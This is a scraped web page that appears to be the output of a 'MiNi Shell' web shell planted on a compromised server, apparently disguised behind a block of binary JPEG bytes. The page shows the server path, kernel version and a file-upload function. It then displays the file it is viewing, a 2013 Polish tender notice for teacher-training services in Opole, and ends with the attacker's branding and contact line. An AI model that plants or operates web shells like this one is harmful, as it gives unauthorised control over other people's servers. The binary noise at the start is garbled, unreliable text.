JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130130/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130130/41596-N-2013.html

<p class="kh_header"><b>Opole: Przetarg nieograniczony na usługę organizacji szkoleń dla nauczycieli w ramach projektu pod nazwą:  Kompetentne kadry oświaty kapitałem regionu - III</b><br>
<b>Numer ogłoszenia: 41596 - 2013; data zamieszczenia: 30.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalne Centrum Rozwoju Edukacji , Ul. Głogowska 27, 45-315 Opole, woj. opolskie, tel. 774 579 895, faks 774 552 979.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.rcre.opolskie.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na usługę organizacji szkoleń dla nauczycieli w ramach projektu pod nazwą:  Kompetentne kadry oświaty kapitałem regionu - III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na organizacji szkolenia i pełnieniu funkcji nauczyciela prowadzącego zajęcia dla nauczycieli zatrudnionych w szkołach i placówkach oświato-wych usytuowanych na obszarach wiejskich województwa opolskiego, w ramach projektu pod na-zwą: Kompetentne kadry oświaty kapitałem regionu - III edycja, współfinansowanego ze środków Europejskiego Funduszu Społecznego (EFS) w ramach Działania 9.4 Programu Operacyjnego Ka-pitał Ludzki.

CZĘŚĆ 1 
Temat szkolenia: Ewaluowanie pracy szkoły szansą na jej rozwój
Liczba szkoleń w danej części: 1 (1 grupa po co najmniej 15 osób)
Liczba godzin w szkoleniu: 60 godzin stacjonarnych
Miejsce szkoleń: Regionalne Centrum Rozwoju Edukacji w Opolu lub placówka oświatowa na tere-nie województwa opolskiego
Termin szkolenia: do  25.04.2013 r. 
Tematyka:
-Ewaluacja jako gwarancja jakościowego rozwoju szkoły.
-Analiza wymagań Państwa wobec szkół,
-Zadania dyrektora wynikające z organizacji realizacji działań ewaluacyjnych.
-Budowanie modelowego procesu ewaluacji wewnętrznej w szkole.
-Metodologia prowadzenia badań społecznych (badania ilościowe i jakościowe).
-Opracowanie przykładowych narzędzi badawczych.
-Techniczne opracowanie materiału badawczego.
-Sposób upowszechniania wyników badań (sprawozdania, raporty z wnioskami i rekomendacjami).

CZĘŚĆ 2
Temat szkolenia: Rola nauczyciela przedszkola w osiąganiu przez dzieci gotowości szkolnej
Liczba szkoleń w danej części: 1 (1 grupa po co najmniej 15 osób)
Liczba godzin w szkoleniu: 60 godzin stacjonarnych
Miejsce szkoleń: Regionalne Centrum Rozwoju Edukacji w Opolu lub placówka oświatowa na tere-nie województwa opolskiego
Termin szkolenia: do 25.04.2013  roku
Tematyka: 
-Analiza podstawy programowej pod kątem nowych obowiązków nauczyciela oraz wiadomości i umiejętności absolwenta przedszkola.
-Gotowość szkolna - czynniki wpływające na jej osiąganie.
-Metody, techniki i narzędzia diagnostyczne (Skale Gotowości Szkolnej).
-Jak pracować z dziećmi uwzględniając ich indywidualny rozwój?
-Praktyczna prezentacja metod stymulujących rozwój psychoruchowy dziecka-Metoda Dobrego Startu, Ruchu Rozwijającego, R. Labana, M. i A. Kniessów, E. Gruszczyk-Kolczyńskiej, Projektów Edukacyjnych, Pedagogiki Zabawy, Batii Straus.

CZĘŚĆ 3
Temat szkolenia: Pomiar dydaktyczny w praktyce nauczycielskiej w edukacji matematyczno-przyrodniczej
Liczba szkoleń w danej części: 1 (1 grupa po co najmniej 15 osób)
Liczba godzin w szkoleniu: 60 godzin  (w tym 32  stacjonarne  i 28 e-learningu)
Miejsce szkoleń: : Regionalne Centrum Rozwoju Edukacji w Opolu lub placówka oświatowa na te-renie województwa opolskiego
Termin szkolenia: zakończenie szkolenia do 25.04.2013 roku
Tematyka: 
-Analiza treści kształcenia: cele i wymagania programowe edukacji matematyczno-przyrodniczej.
-Planowanie procesu sprawdzania osiągnięć w zakresie treści matematyczno-przyrodniczych- wła-ściwości pomiaru dydaktycznego, formy i rodzaje zadań oraz ich właściwości i zastosowanie
-Konstruowanie zadań zgodnych z planem testu w zakresie treści matematyczno-przyrodniczych oraz analiza ich stosowności.
-Konstruowanie kluczy odpowiedzi do zadań otwartych. Przygotowanie badań próbnych.
-Zasoby Internetowe dla nauczycieli przedmiotów matematyczno-przyrodniczych przydatne do zajęć online ( zasoby CKE, OKE).
-Podstawy pracy na platformie Modle.
-Analiza i interpretacja wyników badań osiągnięć szkolnych, w tym wyników egzaminów zewnętrz-nych w części matematyczno-przyrodniczej.
-Wnioskowanie z wyników badań próbnych - redagowanie raportów. Wykorzystanie wniosków z badań osiągnięć w planowaniu zajęć dydaktycznych na przedmiotach matematyczno-humanistycznych.
-Ewaluacja własnego systemu dydaktycznego nauczyciela przedmiotów matematyczno- przyrodni-czych  oraz szkolnego systemu kształcenia.

CZĘŚĆ 4  
Temat szkolenia: W trosce o zdolności i talenty każdego ucznia
Liczba szkoleń w danej części: 1 (1 grupa po co najmniej 15 osób)
Liczba godzin w każdym ze szkoleń: 60 godzin stacjonarnych
Miejsce szkoleń: Regionalne Centrum Rozwoju Edukacji w Opolu lub placówka oświatowa na tere-nie województwa opolskiego
Termin szkoleń: zakończenie szkolenia do 25.04.2013  roku
Tematyka: 
-Modele zdolności i ich rozwój.
-Identyfikacja uczniów wybitnie zdolnych.
-Diagnoza i charakterystyka możliwości i ograniczeń uczniów w procesie uczenia się.
-Możliwości zaspokajania potrzeb uczniów w świetle obowiązującego prawa oświatowego.
-Metody i techniki pracy z uczniem o szczególnych wymaganiach edukacyjnych:
	- metody zwiększające tempo pracy z uczniami wybitnie zdolnymi,
	- odblokowanie emocjonalne uczniów z syndromem nieadekwatnych osiągnięć szkolnych,
	- metody i techniki motywujące uczniów do poszerzania swojej wiedzy i umiejętności.

CZĘŚĆ 5
Temat szkolenia: Wprowadzanie Nowej Podstawy Programowej w zakresie matematyki w klasach IV - VI szkół podstawowych 
Liczba szkoleń w danej części: 1 (1 grupa po co najmniej 15 osób)
Liczba godzin w szkoleniu: 60 godzin stacjonarnych
Miejsce szkoleń: Regionalne Centrum Rozwoju Edukacji w Opolu lub placówka oświatowa na tere-nie województwa opolskiego 
Termin szkoleń: zakończenie szkolenia do 25.04.2013
Tematyka: 
-Zmiany organizacyjne w matematyce
-Wymagania ogólne i szczegółowe w podstawie programowej -planowanie pracy dydaktycznej
-Wykorzystanie komputera w nauczaniu matematyki
-Projekt edukacyjny na matematyce
-Praca z uczniem zdolnym na matematyce
-Pomoc psychologiczno-pedagogiczna dla uczniów w zakresie matematyki

CZĘŚĆ 6     
Temat szkolenia: Rozwijanie zainteresowań i zdolności matematycznych wśród uczniów klas I-III 
Liczba szkoleń w danej części: 1 (1 grupa po co najmniej 15 osób)
Liczba godzin w szkoleniu: 60 godzin stacjonarnych
Miejsce szkoleń: Regionalne Centrum Rozwoju Edukacji w Opolu lub placówka oświatowa na tere-nie województwa opolskiego
Termin szkoleń: zakończenie szkolenia do 25.04.2013
Tematyka: 
-Diagnoza umiejętności matematycznych małego dziecka
-Dziecko w młodszym wieku szkolnym a edukacja matematyczna
-Mity i fakty o rozwijaniu myślenia matematycznego
-Rozwijanie zainteresowań i zdolności matematycznych uczniów na I etapie edukacyjnym - prak-tyczne rozwiązania
-Strony internetowe pomocne w rozwijaniu umiejętności 
matematycznych
-Metoda projektu w edukacji matematycznej małego dziecka.

CZĘŚĆ 7 
Temat szkolenia: Akademia Rękodzieła Artystycznego
Liczba szkoleń w danej części: 2 (2 grupy po co najmniej 15 osób)
Liczba godzin w każdym ze szkoleń: 40 godzin stacjonarnych
Miejsce szkoleń: Regionalne Centrum Rozwoju Edukacji w Opolu lub placówka oświatowa na tere-nie województwa opolskiego 
Termin szkoleń: zakończenie szkoleń do 25.04.2013  roku
Tematyka: 
-Decoupage - podstawowy.
-Decoupage - crackle.
-Technika sospeso.
-Filcowanie na mokro.

CZĘŚĆ 8
Temat szkolenia: Techniki plastyczne wykorzystywane w pracy z dziećmi i młodzieżą
Liczba szkoleń w danej części: 1 (1 grupa po co najmniej 15 osób)
Liczba godzin w każdym ze szkoleń: 60 godzin stacjonarnych
Miejsce szkoleń: Regionalne Centrum Rozwoju Edukacji w Opolu lub placówka oświatowa na tere-nie województwa opolskiego 
Termin szkoleń: zakończenie szkoleń do 25.04.2013  roku
Tematyka: 
-Bibułkarstwo.
-Ekowiklina.
-Tworzenie struktur plastycznych z różnych materiałów.
-Quilling.

Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.51.10.00-9, 80.53.00.00-8, 80.50.00.00-9, 80.42.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca  w celu potwierdzenia dysponowania osobami zdolnymi do wykonania zamówienia musi wykazać, że dysponuje zespołem zdolnym do realizacji zamówienia, a w szczególności  osobą odpowiedzialną za świadczenie usługi tj.: prowadzenie kursów która:
Dla części od 1 do 6
- posiada wykształcenie wyższe (należy podać nazwę uczelni i rok ukończenia studiów)
- posiada następujące kwalifikacje zawodowe tj.: posiada uprawnienia pedagogiczne (należy podać rok nabycia uprawnień) oraz stopień nauczyciela dyplomowanego (należy podać rok uzyskania sto-pienia awansu),
- przeprowadziła co najmniej 3 kursy dla nauczycieli (należy podać nazwy szkoleń, terminy).

Dla części od 7 do 8
- posiada wykształcenie wyższe z zakresu plastyki lub studia podyplomowe z zakresu plastyki (na-leży podać nazwę uczelni i rok ukończenia studiów)
- posiada następujące kwalifikacje zawodowe tj.: posiada uprawnienia pedagogiczne (należy podać rok nabycia uprawnień) oraz stopień nauczyciela dyplomowanego (należy podać rok uzyskania sto-pienia awansu),
- przeprowadziła co najmniej 3 kursy dla nauczycieli (należy podać nazwy szkoleń, terminy).
Ocena spełnienia warunku dokonana zostanie na podstawie:
Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia  wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówie-nia oraz zakres wykonywanych przez nią czynności i informacją o podstawie dysponowania tą osobą sporządzony wg załącznika nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) 	wypełniony formularz ofertowy według załącznika nr 5 do SIWZ,
b) 	pełnomocnictwo (w sytuacji, gdy ofertę podpisuje osoba, której prawo do reprezentowania firmy nie wynika z dokumentu rejestrowego w formie oryginału lub kopii poświadczonej nota-rialnie),
c) Jeżeli wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust 1 ustawy Prawo zamówień publicznych (patrz pkt 9 SIWZ), polega na zasobach innych podmiotów przedkłada pisemne zobowiązanie tych podmiotów do oddania do dyspozycji wykonawcy zasobów określonych w art. 26 ust. 2b ustawy Prawo zamówień publicznych, umożliwiających wykonanie zamówienia, według załącznika nr 7 do SIWZ lub wykonawca  udowodni w inny sposób iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia np. przedłoży zawarte umowy czy oświadczenia, a jeżeli podmioty te będą brały udział w realizacji części zamówienia, zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów wymienionych w pkt 10.2 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, z zastrze-żeniem ust.2.
2. Dopuszcza się zmianę postanowień zawartej umowy, w stosunku do treści oferty, w następującym zakresie i przy spełnieniu następujących warunków:
a)	Zmiana osób z wykazu osób stanowiącego załącznik nr 3 do umowy, wymaga zgody Zamawiającego, przy czym osoba ta musi spełniać wymagania, określone w specyfikacji istotnych warunków zamówienia, w zakresie posiadania wykształcenia, kwalifikacji zawodowych i doświadczenia.
b)	Zmiana terminu realizacji umowy, o którym mowa w § 2 umowy, jest możliwa wyłącznie za zgodą obu Stron umowy.
c)	Zmniejszenie wartości umowy, o której mowa w § 5 ust. 1 umowy, jest możliwe wyłącznie za zgodą obu Stron umowy.
d)	Zmiany w zakresie płatności (np. terminy, sposób płatności) są możliwe wyłącznie za zgodą obu Stron umowy;
e)	W przypadku wystąpienia siły wyższej  możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy.
f)	W przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy.
g)	W przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy. 
3. Zmiany umowy, o których mowa w ust. 2 umowy, nie mogą powodować zwiększenia wartości umowy, o której mowa w § 5 ust. 1umowy.
4. Zmiany umowy, o których mowa w ust. 2 umowy, wymagają formy pisemnej pod rygorem nieważności.
5. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach. W przypadku takiego odstąpienia, nie stosuje się kar określonych w § 7 ust. 3 niniejszej umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.rcre.opolskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalne Centrum Rozwoju Edukacji 45-315 Opole ul. Głogowska 27 Sekretariat - parter..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.02.2013 godzina 13:30, miejsce: Regionalne Centrum Rozwoju Edukacji 45-315 Opole ul. Głogowska 27 Sekretariat - parter..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa realizowana jest na potrzeby Projekt systemowy Kompetentne kadry oświaty kapitałem regionu III, nr POKL: 09.04.00-16-010/11 współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet: IX. Rozwój wykształcenia i kompetencji w regionach Działanie: 9.4. Wysoko wykwalifikowane kadry systemu oświaty.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com